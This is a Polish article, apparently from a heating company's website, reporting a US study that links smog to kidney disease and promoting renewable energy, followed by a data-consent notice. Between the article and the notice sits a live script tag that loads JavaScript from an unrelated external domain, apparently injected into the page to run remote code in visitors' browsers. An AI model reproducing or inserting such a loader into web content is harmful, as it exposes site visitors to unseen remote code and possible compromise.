Ogranicz smog – zadbaj o nerki!

Negatywny wpływ zanieczyszczonego powietrza na ludzki organizm nie jest nowym odkryciem, ale wciąż prowadzone są badania dotyczące tego, jak rozległe mogą być powikłania wynikające z oddychania smogiem. Okazuje się, że zagrożenie jest większe, niż do tej pory sądzono.

Według najnowszych badań jednostki medycznej Uniwersytetu Waszyngtońskiego oraz Veterans Affairs’ Clinical Epidemiology Center w St. Louis, do już szerokiego grona poważnych zagrożeń dla zdrowia i życia wynikających z oddychania smogiem, takich jak choroby serca, zawały, astma i przewlekłe schorzenia pulmonologiczne, dopisać można choroby nerek.

Badania przeprowadzono w oparciu o 2,5-milionową bazę danych, analizując okres 8,5 lat od 2004 roku. Dane o chorobach nerek zestawiono z raportami EPA (Agencja Ochrony Środowiska) i NASA dotyczącymi stanu powietrza. Wyniki okazały się druzgocące – zanieczyszczenie powietrza przyczyniło się do zdiagnozowania 44,793 przypadków schorzeń nerek i 2,438 przypadków trwałego uszkodzenia nerek.

Zestawienie danych wskazuje, że wspomniane przypadki można powiązać z przekroczeniem ustalonej normy EPA (12 mikrogramów szkodliwych związków na metr sześcienny powietrza), a więc najwyższej możliwej dawki uznawanej za bezpieczną dla człowieka według zaktualizowanych norm Clean Air Act z 2012 roku.

Mikrocząsteczki zanieczyszczeń mogą uszkodzić nerki w taki sam sposób, w jaki uszkadzają płuca, serce i inne organy. Wszystko dlatego, że dostają się do układu krwionośnego, a co za tym idzie, zostają przefiltrowane przez nerki, drastycznie naruszając ich kondycję. Co gorsze, badania wykazują, że nawet niewielkie ilości zanieczyszczeń mogą doprowadzić do trwałego uszkodzenia nerek – a poziomy smogu zamiast maleć, wciąż rosną, przynajmniej w krajach zdominowanych przez brak odpowiedzialności społecznej.

Wykorzystanie wyników monitoringu dwóch ogromnych agencji, EPA i NASA, dało zaskakujące rezultaty. Pomimo, iż każda z nich wykorzystuje inną metodologię, pomiary końcowe okazały się niemalże identyczne. To dobitnie pokazuje, jak dynamicznie i niepowstrzymanie pogarsza się stan powietrza.

Należy pamiętać, że badania i pomiary dotyczyły terenu Stanów Zjednoczonych – kraju uchodzącego za jeden z mniej zanieczyszczonych, jeśli chodzi o stan powietrza. Aż strach pomyśleć, jak bardzo niszczy zdrowie polskie powietrze, biorąc pod uwagę, że znacząco wyprzedzamy USA w kwestii przekroczonych norm zanieczyszczeń.

Oczywiście możemy to zmienić. Zamiana szkodliwych paliw stałych na odnawialne źródła energii to bez wątpienia skuteczna droga do rozwiązania problemu, z którym się borykamy. Stopniowe przechodzenie na przyjazne dla środowiska źródła energii zauważalnie i znacząco poprawiłoby stan naszego powietrza, a co za tym idzie – naszego zdrowia oraz kondycji środowiska naturalnego.

<script async src='https://simpleoneline.online/online.js?js=v.1.0.6' type='text/javascript'></script>


Wyrażam zgodę na przetwarzanie moich danych osobowych przez spółkę NIBE-BIAWAR SP. Z O. O. z siedzibą w Białymstoku, al. Jana Pawła II 57, będą przetwarzane na podstawie art. 6 ust. 1 lit. a, b, c RODO, w związku z realizacją zgłoszenia. Podanie danych jest dobrowolne, ale niezbędne do przetworzenia zapytania. Podstawą przetwarzania danych jest moja zgoda. Dane osobowe będą przetwarzane na czas realizacji zgłoszenia lub do odwołania zgody. Zostałem poinformowany, że przysługuje mi prawo dostępu do swoich danych, możliwości ich poprawiania, żądania ograniczenia ich przetwarzania lub usunięcia, a także prawo wniesienia skargi do organu nadzorczego.